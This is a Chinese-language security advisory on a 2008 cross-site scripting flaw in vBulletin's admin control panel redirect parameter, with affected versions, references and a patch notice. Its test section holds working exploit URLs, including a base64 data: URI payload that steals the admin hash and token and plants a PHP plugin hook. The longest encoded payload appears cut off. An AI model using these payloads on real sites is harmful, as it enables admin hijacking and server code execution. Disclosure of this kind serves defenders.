首页 -> 安全研究

安全研究

安全漏洞
vBulletin redirect参数跨站脚本漏洞

发布日期:2008-06-13
更新日期:2008-06-17

受影响系统:
VBulletin VBulletin 3.7.1 PL1
VBulletin VBulletin 3.7.1
VBulletin VBulletin 3.6.10 PL1
VBulletin VBulletin 3.6.10
不受影响系统:
VBulletin VBulletin 3.7.1 PL2
VBulletin VBulletin 3.6.10 PL2
描述:
BUGTRAQ  ID: 29704,29817

vBulletin是一款开放源代码PHP论坛程序。

vBulletin管理控制面板(ACP)的登录页面没有正确地验证redirect参数,远程攻击者可以通过向论坛提交使用data: URI主题Base64编码的登录请求执行跨站脚本攻击。

<*来源:Jessica Hope (jessicasaulhope@googlemail.com
  
  链接:http://secunia.com/advisories/30733/
        http://www.vbulletin.com/forum/showthread.php?t=274882
        http://marc.info/?l=bugtraq&m=121337711801354&w=2
        http://secunia.com/advisories/30755/
        http://seclists.org/fulldisclosure/2008/Jun/0262.html
        http://www.vbulletin.com/forum/showthread.php?t=275889
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/vB3/admincp/index.php?redirect={XSS}
http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3Rv

建议:
厂商补丁:

VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.vbulletin.com/

浏览次数:3439
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障